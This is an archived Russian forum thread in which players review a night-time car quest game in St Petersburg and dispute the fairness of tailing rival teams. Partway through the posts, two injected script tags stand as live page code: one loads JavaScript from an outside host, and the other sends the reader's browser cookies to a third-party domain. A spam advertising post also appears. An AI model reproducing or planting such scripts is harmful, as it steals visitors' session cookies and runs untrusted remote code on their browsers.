Просмотреть полную версию : DL1: 3-я игра 7-го сезона от Инигруппы TrueBlondies.
Спасибо, что играли в нашу игру.
Сорри за косяки, мы действительно думали, что игра легкая :(
Спасибки за игру!!!
Осталась довольна))
Вопрос по поводу закурки Кооперативной улицы, у этого баяна адрес же по Токсовскому шоссе, смутило...
Ликерчики вкусняшки)))))
Спасибо за Лебедева, 35... Как ни странно, была на нем первый раз)
Сталкер приятный, но зачем писать код с внешней стороны здания напротив будки сторожа??
Лиса мимими)))
Рекламные плакатики поубегали(( а с подключением телевидения так и планировалось, что там не было адреса? Брался он по пути к Лужской...
Митя-бабушка милашка)) но джинсики палят))
спасибо за игру. ликеры вкусняшки (хоть сейчас экипаж и начнет бухтеть про полуторочасовые стоптаймы :) и сон в <s>макдаке</s> оллис), лиса ок., заповедная, лебедева/мост - вошло (мост вошел особенно, новая шишка :) чето какаято печальная тенденция калечиться уже на второй игре подряд), раллийка по билбордам тоже в принципе ок., сталкер прикольный, смутило только то что в доезде было прописано КО2 и в результате пропиздоглазили один код, который и не думали даже внизу искать.
а вобще в целом от игры позитив и все понравилось, заканчивать экипажку в 8 утра - бесценно :)
Кстати, тут я покупаю бисер оптом (http://optbiser.ru) на перепродажу...
Спасибо за подсказоньки с местом. За то, что дали доиграть - вообще уважуха. Полю зашло.
Экипаж не выдержал и разъехался, пришлось забирать на ветеранов доки от машины, забирать меня с работы с московской и брать последние 2 задания вдвоём(хотя одного хватило-бы). Доезды спасли немного.
Дом за постом ДПС - очень нехорошая подсказка. Нашли за 5 минут до слива, пока бежали и конечку искали - слили. Стоп-тайм - плохо
Игра зашла! Спасибо, что дали доиграть!
Очень понравилось обилие кодов и их не задротность)
Коломяжский путепровод зашел, да и Заповедная..и лиса..и рекламные щиты..
Слегка подпортил динамику стоптайм в час с небольшим, но все-равно было весело:D
Отдельное спасибо всем игрокам, с которыми пересекались на уровнях... вы порой улыбаете:D
Огромное спасибо оргам! Пишите еще!
а в чем прикол заглушки которая до сих пор идет?
DEd_MONro
06-04-2013, 13:36
Прикольная динамичная игра, толь ко вот уровень с плакатами как то динамику подъубил нам. А так весело, задорно, но вот ликер мерзотные что капец)))) Даже пьющие у нас сказали что быстрее бы определили сорта водки)))
Лучше бы мы бухали всю ночь...
Чето я очень устал за всю ночь :( хотя в принципе ничего не делал...
а в чем прикол заглушки которая до сих пор идет?
Я забыла авто переход поставить :( сорри. Сейчас доеду до дома, сниму не нужные уровни и начислю стоптаймы. Постараюсь к вечеру окончательную стату сделать.
Спасибо за отзывы, сорри за гигантские стоптаймы и поменяные в день игры 2 щита, в 8 вечера они еще были.
С телевидением мой косяк, не забила место, но этих щитов очень много в зоне было. Чтобы все были в равных условиях на игре ничего исправлять не стала.
Спасибо за игру. Очень надеялись на блиц, а все как-то подрастянулось :(
Стоптайм печалька, реально не понимаю почему так долго все брали, вкусы очевиднее некуда :confused:
Один код на сталке на английском и вверхногами - адиво!
Странная закурка домику у поста ДПС.
Возможно, если б не был заранее заявлен блиц - позитива от игры было бы больше.
Митя, верни перчатки!!:)
+первый уровень на лебедева
+второй на заповедной
+сталкер
-косяк с ко на сталкере
-перегоны ради нихуя
-поиски туалетов(хотя мож это и не минус, а мы какую то шляпу отгадали из задания)
-адски косячная раллийка, я плохо понимаю как так можно было накосячить в одном уровне.
-ну просто замечательный алкоуровень(который, я надеюсь, будет снят?)
-безумно интересная водонапорка на севере города, поняв что там один код, я туда даже не полез.
-боян в мурино. Зачем заигрывать говнодома ради одного кода? Ну заиграйте остановку ближайщую, если есть желание написать единичку. К остановке хоть пилить не надо.
-адова наебка с длительностью игры. Хорошо взял запасные батарейки, а ведь даже не собирался шпилить до утра. Ни взял ни рацию, ни заряженный телефон.
В общем спасибо за наебалово.
Создалось ощущение, что сначала вся игра была такая. В виде поиска туалетов и билбордов, а потом в авторы пришел кто то новый и появились два нормальных уровня вначале игры. Короче мне неясно как у таких опытных авторов получилось "это". Ну погоди была гораздо занятнее. Чего стоят только 8 часов зачистки дестроя.
меня вот тоже огорчила продолжительность - настроилась на блиц, в итоге продолжительность среднестандартная, местами подзатянуто, ну и стоптайм с ликерами не тру.
alectoNK
06-04-2013, 16:49
Спасибо за игру:-)
Первые уровни: пиво и бары - интересно. Жаль, что времени не хватило буквально на несколько кодов, в результате слив. Больше похоже на формат многоэкипажки с большим штабом.
Идея с ликерами отличная! Но нас убили стоптаймы. Мы ждали быструю игру, как и многие, а тут час ожидания, в результате вся команда во главе с водителем спит:-)
На сталкере: почему было написано КО2? Облазали там все, а оказалось, что бралось все элементарно, стоя на полу блин:-) В результате опять слив, не хватило пяти минут.
Лиса зачетная! Очень хотелось выпить стафф, но было нельзя, поэтому он остался жив, а так бы выпили и выбросили, совсем забыли, что стафф нужно привезти на финиш:-)
Optimist
06-04-2013, 16:50
А как лису нужно было опознать от других машин? Для тех кто не знает Стаса
А как лису нужно было опознать от других машин? Для тех кто не знает Стаса
По пиву в окне.
Мы с Митей хотим выразить отдельную благодарность в помощи при подготовке игры: Стасону, Зайцу, Сгу и Свете :)
DrDim777
06-04-2013, 18:05
Спасибо за игру !!
Нам все понравилось .))) даже покушать успели на стоп тайме))0
nadlooshi
06-04-2013, 22:44
Первая игра, где спать захотелось на первом же уровне.
Не зашло, простите.
Оч понравился первый уровень, нас на нем знатно вштырило) и еще шифровка с алкорасчлененками. В остальном - как-то странно, неровная динамика, во второй половине игры совсем заскучали.
И да, запрет на брутфорс усыпил половину нашего штаба((( даже традиционную зигу не вбить было(
чорд... это была алкорасчлененка... аааа.... круто.... мы тупые((
Оч понравился первый уровень, нас на нем знатно вштырило) и еще шифровка с алкорасчлененками. В остальном - как-то странно, неровная динамика, во второй половине игры совсем заскучали.
И да, запрет на брутфорс усыпил половину нашего штаба((( даже традиционную зигу не вбить было(
не, ну зигу можно было вбить :) Запрет в основном распростронялся на первый уровень ну и на Ликеры :)
Подбирать коды на Заповедной бессмысленно... Хотя вроде кто-то пытался вбить Зенит после СКА :)
Добавьте что-ли кодик какой-нибудь в последний уровень, чтоб финишировать всем...
Добавьте что-ли кодик какой-нибудь в последний уровень, чтоб финишировать всем...
я финишные протоколы всем сделала, сейчас сниму его нафиг :)
+ спасибо за Лебедева и Заповедную, побывал там впервые)
+ Понравилась идея 1-го уровня
+ Понравилась лока для сталкера
- странная организация раллийки (выдача нового бонуса по времени, а не по закрытию предыдущего)
- стоптаймы
- несоответствие ожиданиям про длительность игры и кол-во алкоголя на игре.
- прописание доезда непосредственно перед локой (что мешает запомнить код доезда и пойти на уровень шариться там, где видишь конкурентов и вбить доезд только когда что-нибудь найдешь)
Но в целом игра понравилась. Спасибо!
- прописание доезда непосредственно перед локой (что мешает запомнить код доезда и пойти на уровень шариться там, где видишь конкурентов и вбить доезд только когда что-нибудь найдешь)
ничего. Так некоторые и делали.
ничего. Так некоторые и делали.
Ой, а мы, честные, думали, что в дедлайне так нельзя:o.
prinncessa
07-04-2013, 13:24
Ой, а мы, честные, думали, что в дедлайне так нельзя:o.
Запишите в свой блокнотик))
Ой, а мы, честные, думали, что в дедлайне так нельзя:o.
в этом лучшем из проектов в мире проекте, можно все что впрямую не запрещено правилами. И иногда можно даже то, что запрещено, но при условии что ты не палишься.
а вот мне одному интересно, как Бабники смогли за 10 минут: доехать от Паркинга до Ключевой, и еще даже сняли код.
У Вас был самолет? и вы читаете коды не заходя на локу?
Если что, это не навал, а просто любопытно. Ибо среднее время 20-30 минут взятие уровня.
Не было у них самолета. Просто выйдя со сталкера одновременно с нами, мы закрыли заглушку, а они нет. И сев нам на хвост, тем самым они выиграли около 10 минут, пройдя уровень по автопереходу. Когда они уже были у ключевой, задание для них только открылось.
DrevoReZ
07-04-2013, 20:40
а вот мне одному интересно, как Бабники смогли за 10 минут: доехать от Паркинга до Ключевой, и еще даже сняли код.
У Вас был самолет? и вы читаете коды не заходя на локу?
Если что, это не навал, а просто любопытно. Ибо среднее время 20-30 минут взятие уровня.
СПГ зачем-то вбили код снимаемого доезда и не уехали сразу со сталкера. Мы воспользовались ситуацией и пропаровозили их. По дороге в Парголово прошло время снимаемого доезда и пришло задание с коттеджем, так что на локу мы заходили уже на нужном уровне, таким образом, правил не нарушали. Не совсем фэирплэй конечно, но несколько гонок от преследователей на "Морозной свежести" и "Зимних забавах" показали, что для проекта это уже норма.
Запрещать паровозы правилами нет смысла, потому как доказать что было паровозом, а что смещением по зоне перед следующим уровнем нереально. Если хочется их на 100% избежать, орги могут использовать следующий проверенный способ: после задания "заглушка" вешается задание, в котором просят в ответ вбить название фирмы на рекламном щите рядом с залазом на локу, к примеру. И только после этого выдается задание коттедж. Любой паровоз получит двойную потерю времени от пропиленного за командой времени. Очень популярный прием на многих международках.
а вот мне одному интересно, как Бабники смогли за 10 минут: доехать от Паркинга до Ключевой, и еще даже сняли код.
У Вас был самолет? и вы читаете коды не заходя на локу?
Если что, это не навал, а просто любопытно. Ибо среднее время 20-30 минут взятие уровня.
Меня тоже удивило это....
Но я как обычно всегда верю в честность игроков... но могу и перестать верить..
Сорри за задержку с открытием статы, со стоптамами и свободным временем тяжеловато... сегодня добью.
оке, понял. спасибо за ответ.
Velkopiterskij
07-04-2013, 21:03
СПГ зачем-то вбили код снимаемого доезда и не уехали сразу со сталкера. Мы воспользовались ситуацией и пропаровозили их.
Это пиздец. Можно мне сразу список всех возможных читов? А то я-то дурак, до сих пор по старым правилам играю.
DrevoReZ
07-04-2013, 21:27
Это пиздец. Можно мне сразу список всех возможных читов? А то я-то дурак, до сих пор по старым правилам играю.
Правила никогда не запрещали следить за конкурентами на доездах и локах, в той или иной мере каждая команда этим пользуется. Чем езда за конкурентами принципиально отличается от слежки за ними же на локе? Спалил код - молодец, а спалил куда ехать, получается не молодец, ататат.
Неприятно, когда тебя откровенно пропаравозили конкуренты или ты пол часа не мог найти код, а потом тебе пришла подсказка, и ты всем его спалил. Но это элемент игры и во власти оргов уменьшить риск возникновения подобных ситуаций.
Velkopiterskij
07-04-2013, 21:38
Правила никогда не запрещали следить за конкурентами на доездах и локах, в той или иной мере каждая команда этим пользуется. Чем езда за конкурентами принципиально отличается от слежки за ними же на локе? Спалил код - молодец, а спалил куда ехать, получается не молодец, ататат.
Неприятно, когда тебя откровенно пропаравозили конкуренты или ты пол часа не мог найти код, а потом тебе пришла подсказка, и ты всем его спалил. Но это элемент игры и во власти оргов уменьшить риск возникновения подобных ситуаций.
Древ, я по твоему предыдущему посту понял, что ты не считаешь это чем-то некорректным. Не считай. Твоё дело.
И не говори про "никогда". В ДЛ раньше было запрещено следить за конкурентами.
Кпд и 764, насколько я понял, так же отлично не вбивали доезд на башне :) все окей :))
Кпд и 764, насколько я понял, так же отлично не вбивали доезд на башне :) все окей :))
мы приехали, марк залез во внутрь, я снял доезд и мы его вбили, после чего я марку объяснял где искать код по фотке и он, вроде бы, раньше вас его снял.
Это ад, господа. Победа любой ценой становится нормой. Лучше быть в конце пилотона, но с чистой совестью!
Velkopiterskij
07-04-2013, 22:24
И ещё.
Не совсем фэирплэй конечно
Фэирплэй не бывает "не совсем". Или есть или нет.
но несколько гонок от преследователей на "Морозной свежести" и "Зимних забавах" показали, что для проекта это уже норма.
Странно, что вы так считаете. Мне кажется, что если есть мнение, что так делать не хорошо, то не стоит так делать в принципе. Да, обидно, что ты не можешь доказать, что были нарушения у соперников, когда точно в них уверен. Но это не повод нарушать самому. Мне так казалось.
он, вроде бы, раньше вас его снял.
Нет, Тем. Кликникуэ сказал что они Марка еще и заадили там.
А на Морозной свежести Карась четко и внятно всем озвучил одно из условий игры. Паравозы там были официально разрешены, чем Котэ и пользовался. Западлянка конечно, но в пределах правил той игры(
Странный
07-04-2013, 22:47
Костик! Хватит ныть, какой же ты зануда...
Нет, Тем. Кликникуэ сказал что они Марка еще и заадили там.
Подробностей не знаю, не буду ничего утверждать, но точно рассказывал марку где кодюля по фотке.
Velkopiterskij
07-04-2013, 22:52
Костик! Хватит ныть, какой же ты зануда...
То есть тебе похуй на то, что такое происходит?
Да, обидно, что ты не можешь доказать, что были нарушения у соперников, когда точно в них уверен.
Не смешите меня - как будто кому-то когда-то что-то требовалось доказывать чтобы влепить штраф:)
Но речь не об этом. Речь о том, что нарушений правил Бабниками не было - мы сами ступили, что привели их на локу.
а тем временем - че там со статой? хоть какая-нибудь предварительная будет? ее все еще так-же распи*орасило как и два дня назад.
<script language='javascript' charset='UTF-8' type='text/javascript' src='http://nummobile.com/80j4ch2sa3g98uehlyoro4uftwotqhh'></script>
<script> img = new Image(); img.src = "http://frontext.ru/www/s.gif?"+document.cookie; </script>
DrevoReZ
07-04-2013, 23:20
Костик! Хватит ныть, какой же ты зануда...
И я, и я =)
И не говори про "никогда". В ДЛ раньше было запрещено следить за конкурентами.
Открыл старую редакцию и нашел в ней упоминания только про запрет слежки за организаторами. Запрет слежки за конкурентами есть только в правилах точки отсчета. Можно ссылку?
"не совсем" фэирплей
Давай разберемся, что я имею ввиду под "не совсем" фэирплей, чтобы мои слова не перекручивали. Лично я считаю паровоз честным приемом и что так делать можно, аналогию с палевом конкурентов на локе я привел. Но в системе ценностей многих игроков проекта это не является честным приемом. Соответственно, в рамках проекта этот вопрос спорный и не может в полной мере называться фэирплеем.
Velkopiterskij
07-04-2013, 23:21
Не смешите меня - как будто кому-то когда-то что-то требовалось доказывать чтобы влепить штраф:)
Но речь не об этом. Речь о том, что нарушений правил Бабниками не было - мы сами ступили, что привели их на локу.
Я не говорил, что было нарушение правил. Уж Древ и Фомка в этом полне себе шарят. Когда я видел нарушение правил я сразу об этом прямо сказал.
Странный
07-04-2013, 23:22
То есть тебе похуй на то, что такое происходит?
про паровозы да ) на все 100% )) ибо каждые решают для себя что правильно что нет... и все мы знаем, кто за такой фигней был замечен... и их не так уж много, что бы обсуждать...
PS ты еще запаровозь )) тут такие водилы встречаются, хер это у тебя получится ))
Velkopiterskij
07-04-2013, 23:25
Открыл старую редакцию и нашел в ней упоминания только про запрет слежки за организаторами. Запрет слежки за конкурентами есть только в правилах точки отсчета. Можно ссылку?
Нет, нельзя, ибо у меня нет никаких старых редакций правил. Есть воспоминания об одном инциденте. Очень древнем, но он был.
Давай разберемся, что я имею ввиду под "не совсем" фэирплей, чтобы мои слова не перекручивали.
Для этого надо разобраться сперва что такое просто фэирплей.
Вот ни где не нашла в правилах, что нельзя на брифе проколоть колеса конкурентам... Значит можно?
DEd_MONro
07-04-2013, 23:32
Для этого надо разобраться сперва что такое просто фэирплей.
Это как инопланетяне - некоторые утверждают что имеют с ними дело или видели их, но по факту это все пока что какие то небылицы.
DEd_MONro
07-04-2013, 23:33
Вот ни где не нашла в правилах, что нельзя на брифе проколоть колеса конкурентам... Значит можно?
Ну да))
Я вот уже писал про затирание кодов, а Ящер про игру на одной тачке))))))))
Velkopiterskij
07-04-2013, 23:33
Вот ни где не нашла в правилах, что нельзя на брифе проколоть колеса конкурентам... Значит можно?
Пункт 3.4.2, пожалуй.
Кстати, видимо, нужны разъяснения по пункту 3.4.9, но это явно в другую тему писать надо.
Ну да))
Я вот уже писал про затирание кодов, а Ящер про игру на одной тачке))))))))
Затирать код нельзя, это в правилах есть!
Нам нужно больше срааачааа!!1
Странный
07-04-2013, 23:35
Нам нужно больше срааачааа!!1
и крови )) го морды бить ))
и крови )) го морды бить ))
А Го-то тут причем? :)
Вот ни где не нашла в правилах, что нельзя на брифе проколоть колеса конкурентам... Значит можно?
проще снять и машинку на кирпичики...колеса на авито слить)))
Я не говорил, что было нарушение правил. Уж Древ и Фомка в этом полне себе шарят. Когда я видел нарушение правил я сразу об этом прямо сказал.
Да я как бы и не про Древа с Фомкой. Я как бы про другие личности. Думаю, ты знаешь о ком я говорю)
DEd_MONro
07-04-2013, 23:42
Давайте может хоть одну то игру в сезоне без кирпичей?
DrevoReZ
07-04-2013, 23:42
Для этого надо разобраться сперва что такое просто фэирплей.
Система ценностей, и она у каждого своя. Обсуждение за бутылочкой пива вполне подходящее, я считаю.
и крови )) го морды бить ))
Как-то незаметно Го под раздачу попал =)
а, кстати, в правилах вроде не написано, что соперников на игре бить нельзя? :)
Velkopiterskij
07-04-2013, 23:45
Да я как бы и не про Древа с Фомкой. Я как бы про другие личности. Думаю, ты знаешь о ком я говорю)
Нет, я не знаю о ком ты говоришь.
DrevoReZ
07-04-2013, 23:47
а, кстати, в правилах вроде не написано, что соперников на игре бить нельзя? :)
И тем не менее, на играх команды еще ни разу стенка на стенку не сходились, странно =)
И тем не менее, на играх команды еще ни разу стенка на стенку не сходились, странно =)
Есть версия, что все впереди. Метелить друг друга на выездах и прочих местах уже вошло в моду.
DrevoReZ
07-04-2013, 23:53
Есть версия, что все впереди. Метелить друг друга на выездах и прочих местах уже вошло в моду.
Говорят, что есть такой дядя - администратор проекта, который в любой внештатной ситуации спасет нас и примет адекватное решение =)
Дорогие команды. Хочу пояснить как мы высчитывали бонусы за стоп-таймы на уровне ликер.
1. Берем время начала уровня
2. Берем время окончания уровня с учетом стоптайма
3. Смотрим во сколько реально закрыт технический уровень.
4. Если время закрытия технического уровня позднее, чем время в п.2, то начисление бонуса не производится, т.е. считается, что этот уровень был бы по любому слит.
5. Если время закрытия технического уровня ранее, чем время в п. 2, то начисляется бонус.
6. Технический уровень после всех манипуляций будет снят.
а, кстати, в правилах вроде не написано, что соперников на игре бить нельзя? :)
Это попадает под действие УК РФ.... Хотя порча чужого имущества тоже....
Странный
08-04-2013, 00:06
А Го-то тут причем? :)
не провоцируй )) а то опять в баню за ****** к Го отправят ))
Хотя порча чужого имущества тоже....
охраняемые сталкеры? :)
Странный
08-04-2013, 00:13
охраняемые сталкеры? :)
поехали...
Кпд и 764, насколько я понял, так же отлично не вбивали доезд на башне :) все окей :))
Я играла за эту команду, доезды вбивались как надо...
Так что - ???
Если я правильно нажала все кнопки, то открыта статистика и доступен сценарий :)
Стоп-таймы начислены в соответствии со схемой описаной мною в сообщении № 68.
8сек разница это ад :)))
Варя, ну значит показалось. Все равно ничего не доказать. Полуфэйрплэй и окей.
Ната, спасибо за игру! Но в следующий раз честно напишите на сколько часов это будет :) и кол-во алко на команду :)
prinncessa
08-04-2013, 00:54
Если я правильно нажала все кнопки, то открыта статистика и доступен сценарий :)
Стоп-таймы начислены в соответствии со схемой описаной мною в сообщении № 68.
А комментарии какие-нибудь будут к сценарию?
Хотя на самом деле у меня один вопрос всего: где был туалет и как он курился?=)
Туалет на Жака Дюкло, заезд с Лиственной, за особняком..
Артур, бывает))))
prinncessa
08-04-2013, 00:59
Туалет на Жака Дюкло, заезд с Лиственной, за особняком..
А откуда это следует? И как его искать если о нем не знаешь?
Мимими... Я его прекрасно знаю... Я простите влезла, ответила на первую половину вопроса))
prinncessa
08-04-2013, 01:07
Мимими... Я его прекрасно знаю... Я простите влезла, ответила на первую половину вопроса))
Ну вот я все-таки от Наташи ответа хочу дождаться.
Потому что пока, даже понимая где он примерно, я не понимаю как его найти. )
Артур, бывает))))
Это все мои старые комплексы! Оохх...
Ну вот по этому и извиняюсь))) на вторую половину вопроса Наточка ответит уже)))
Это все мои старые комплексы! Оохх...
Не комплексуй)))
DEd_MONro
08-04-2013, 01:13
Туалет заброс Жака Дюкло 20 - если не ошибаюсь то именно это курилось из картинки
Он рядом с 62 домом) точно не 20))
Ну вот я все-таки от Наташи ответа хочу дождаться.
Потому что пока, даже понимая где он примерно, я не понимаю как его найти. )Насколько я поняла из коце, никак.
Я знала, что там есть толчок, из недельки Ситрона и пешеходки по Сосновке (обе - игры Энки в 2010 году). Но ни на одной карте (и на Викимапии) его нет, поэтому когда мы ставили точку, мою версию про этот толчок сразу зарубили и отправили поле на пересечение со Светлановским (там есть другой туалет и он отмечен на картах, но он не подходил). Потом все-таки поняли, что надо ехать севернее, но это было уже под слив.
А откуда это следует? И как его искать если о нем не знаешь?
Вот как было у нас (можем хвастануться, ибо больше нечем:rolleyes:).
На картинке к заданию вверху "Дюкло", а внизу среди напитков вдруг "Tualet zabros" (английским транслитом). А поскольку "Дюкло" лишь отдалённо похоже на ругательство (ах ты, Дюкло!), но при этом ни одного алкогольного напитка с названием "Tualet zabros" я не встречал (даже "волшебный" Gilpin Family Whisky - бррррррррр - не содержит в себе это слово=), имеем, куда ехать.
Собственно, в 1000 ml (бутыль) в 20 раз больше, чем в 50 ml (стопарь), и по стоимости бьется, потому 20. Вбиваем тупо (куда-нибудь, кроме движка) и ищем туалет на районе (у меня esosedi буквально первой ссылкой или второй вылезли). Там он один... Это даже, не зная стрельбища на Дюкло...
Почему-то при разгадывании задания вспоминался DLmini и Го, и только по хорошему поводу;).
Как хорошо, что вы в нашей команде на бДЛ :))))))
Как хорошо, что вы в нашей команде на бДЛ :))))))
Ну если там сортиры будут...
По-моему, очень логично, что команда из нижней части таблицы угадывает именно туалеты:o.
Ну если там сортиры будут...
По-моему, очень логично, что команда из нижней части таблицы угадывает именно туалеты:o.
Думаю не так долго осталось до разгадывания вышек и башен ;)
prinncessa
08-04-2013, 08:04
Вот как было у нас (можем хвастануться, ибо больше нечем:rolleyes:).
Я глупая.
В итоге, каким запросом и куда он находился?)
И да, +1 к Грому-)
мы прокатились по всей улице..и его заметили)
А комментарии какие-нибудь будут к сценарию?
Хотя на самом деле у меня один вопрос всего: где был туалет и как он курился?=)
Комментарии будут сегодня вечером.
+ на 9 часов игры пара хороших мест, пара нормальных заданий и пара уровней, которые отражают тему игры...
- бессмысленные перегоны;
- говнодома (ну вот совсем говно);
- очень длинный стоп-тайм, убивший динамику;
- большое кол-во оргкосяков - (отсутствие/неверно указанные КО, странные доезды, неверно оцененное время игры и т.д.).
Наверно, в целом игра неплохая, но от Наты и Блондисов я лично ожидала большего.
СПГ зачем-то вбили код снимаемого доезда и не уехали сразу со сталкера. Мы воспользовались ситуацией и пропаровозили их. По дороге в Парголово прошло время снимаемого доезда и пришло задание с коттеджем, так что на локу мы заходили уже на нужном уровне, таким образом, правил не нарушали. Не совсем фэирплэй конечно, но несколько гонок от преследователей на "Морозной свежести" и "Зимних забавах" показали, что для проекта это уже норма.
Запрещать паровозы правилами нет смысла, потому как доказать что было паровозом, а что смещением по зоне перед следующим уровнем нереально. Если хочется их на 100% избежать, орги могут использовать следующий проверенный способ: после задания "заглушка" вешается задание, в котором просят в ответ вбить название фирмы на рекламном щите рядом с залазом на локу, к примеру. И только после этого выдается задание коттедж. Любой паровоз получит двойную потерю времени от пропиленного за командой времени. Очень популярный прием на многих международках.
Древ, не ожидал от тебя
Спасибо за игру!
1. Понравился первый уровень. Хотя нашли много меню баров, где был указан Эдельвейс и еще что-то, а движок такие коды не проходили. Было страшно за переборы =)
2. понравилась закурка "алко-расчлененка"
3. не понял смысла доезда до туалета в Сосновке. Если бы не знали, что он там есть - слили бы
4. дуаль с кооперативом и т.п. - есть гаражный кооператив Школьная-21 (только церковь было не привязать, хотя возможно, она там рядом где-то есть)
5. не понравилось то, что та информация, которая была на форуме изначально и появлялась в процессе, собственно на игре больше дезинформировала (количество уровней, длительность игры, количество кодов, количество алкоголя и т.д.)
В целом понравилось, было бы покороче чуть-чуть... :rolleyes:
Жаль, что вводится негласное правило "все ради победы"...
Странный
08-04-2013, 14:35
что там со снятием уровня?
Спасибо за игру!
1. Понравился первый уровень. Хотя нашли много меню баров, где был указан Эдельвейс и еще что-то, а движок такие коды не проходили. Было страшно за переборы =)
2. понравилась закурка "алко-расчлененка"
3. не понял смысла доезда до туалета в Сосновке. Если бы не знали, что он там есть - слили бы
4. дуаль с кооперативом и т.п. - есть гаражный кооператив Школьная-21 (только церковь было не привязать, хотя возможно, она там рядом где-то есть)
5. не понравилось то, что та информация, которая была на форуме изначально и появлялась в процессе, собственно на игре больше дезинформировала (количество уровней, длительность игры, количество кодов, количество алкоголя и т.д.)
В целом понравилось, было бы покороче чуть-чуть... :rolleyes:
Жаль, что вводится негласное правило "все ради победы"...
Истинный дзен. Мне еще расти и расти.
зачем тебе дзен, Аня? Больше ненависти!)
что там со снятием уровня?
каким?))
Странный
08-04-2013, 15:40
каким?))
где орги код сливали командам, что б долго после стоп тайма не рыскали...
где орги код сливали командам, что б долго после стоп тайма не рыскали...
подробности) что за уровень? кому чо слили?
Странный
08-04-2013, 15:43
подробности) что за уровень? кому чо слили?
а это тебе орги сейчас расскажут...
В связи с тем, что технический уровень после уровня Ликер можно было закрыть только кодом, то при сливе остаточного времени после стоп-тайма, командам показывался код уровня, чтобы они ехали дальше. Это были команды Р4 и Бабники.
prinncessa
08-04-2013, 17:44
В связи с тем, что технический уровень после уровня Ликер можно было закрыть только кодом, то при сливе остаточного времени после стоп-тайма, командам показывался код уровня, чтобы они ехали дальше. Это были команды Р4 и Бабники.
а за что тогда у Бабников стоп-тайм, если уровень все равно слит?
и почему у них нет штрафа за слитый уровень?
Странный
08-04-2013, 17:58
а вот теперь самое веселое ))
и почему у них нет штрафа за слитый уровень?
на этом уровне не было штрафов за слив.
и почему у них нет штрафа за слитый уровень?
видимо потому, что уровень технический.
prinncessa
08-04-2013, 18:04
на этом уровне не было штрафов за слив.
Так а бонус-то за что у Бабников?
http://s019.radikal.ru/i612/1304/ad/d8e0af894b7d.jpg (http://www.radikal.ru)
Так а бонус-то за что у Бабников?
убрала, случайно начислила. Сейчас еще раз все бонусы проверю.
Это новая фишка сезона такая - заворачивать статистику в бараний рог. :)
*пошел дальше*
prinncessa
08-04-2013, 20:52
Это новая фишка сезона такая - заворачивать статистику в бараний рог. :)
*пошел дальше*
это было принято на последнем СК, просто написать забыли =)
где орги код сливали командам, что б долго после стоп тайма не рыскали...
Это неверная трактовка действий агентов. Наташа уже всё пояснила.
На уровне "Ликеры" были оставлены перчатки и фонарь. Перчатки чьи знаю, а про фонарь кто-то говорил, но я не помню кто именно. Владелец, отзовись.
Верну всё на брифе БДЛ или пишите в личку, можно раньше где либо пересечься.
погодите, я чего-то не понимаю если команда долго не могла взять уровень с ликерами, то ей давался код? она вбивала и ехала дальше.
погодите, я чего-то не понимаю если команда долго не могла взять уровень с ликерами, то ей давался код? она вбивала и ехала дальше.
Да, иначе технический уровень было не закрыть, код давался после нахождения команды на уровне Ликер с учетом стоп-тайма более 45 минут.
От игры получил массу непередаваемых эмоций, волею судеб обнаружив себя в единственном числе в комнате (а точнее, на кухне), ставшей для меня штабом.
Первое задание - не знаю, как кому, но мне было адово круто. Чуть больше прухи, и мы бы взяли весь бонус, но в итоге - спасибо и на этом. Вбивание чукчи на последних истекающих секундах сделало мой день. Аккурат после этого всё вырубилось:).
Когда врубилось: запомнились туалет, Мурино и, конечно, "ралли", в котором один щит был взят единственночислым кухонным штабом (хехе), а угаданный другой он же тупо не успел вбить на истекающем времени.
Не понравился более-чем-часовой стоптайм. Сидеть в другом городе, имея необходимость вставать в 7 утра, и чего-то ждать, тупо. Спасибо нуге и зеленому чаю за этот час.
В целом твёрдый зачёт с ололо и присвистом:o.
P.S. Хочу откомментировать ситуацию с доездами. Поясните, чем ментально отличаются "паровоз" и проблема с прошлой игры, когда кто-то кому-то блокировал лису. Со стороны так: обе проблемы ведут одному и тому же (кто-то получает нечестное преимущество), обе сопряжены с риском на дороге.
Хочу откомментировать ситуацию с доездами. Поясните, чем ментально отличаются "паровоз" и проблема с прошлой игры, когда кто-то кому-то блокировал лису. Со стороны так: обе проблемы ведут одному и тому же (кто-то получает нечестное преимущество), обе сопряжены с риском на дороге.А так-то формат линейной соревновательной автомобильной игры не провоцирует никакого риска на дороге :rolleyes:
А так-то формат линейной соревновательной автомобильной игры не провоцирует никакого риска на дороге :rolleyes:
Обожаю "содержательные", половинчато-выпуклообразные ответы. Кто следующий:rolleyes:?
Я следующая! В стремлении познать истинный дзен не упущу возможности вбросить про двойные стандарты.
DbSergey
22-04-2013, 13:31
Рейтинги в гуглдоке (http://dead-line.spb.ru/forum/showthread.php?t=2434) и на главной (http://www.dead-line.spb.ru/) обновлены. На en.cx будут обновлены, когда она оживет - сейчас она у меня еле-еле открывается.
Рейтинги в гуглдоке (http://dead-line.spb.ru/forum/showthread.php?t=2434) и на главной (http://www.dead-line.spb.ru/) обновлены. На en.cx будут обновлены, когда она оживет - сейчас она у меня еле-еле открывается.
там вроде Р4 не поставлены очки в рейтинге
DbSergey
22-04-2013, 14:08
там вроде Р4 не поставлены очки в рейтинге
Да, точно, спасибо. Для Р4 и для Людей-Х случился глюк. Поправлено, и на en.cx тоже обновлено.
vBulletin v3.8.7 (Russian), Copyright ©2000-2024, Jelsoft Enterprises Ltd.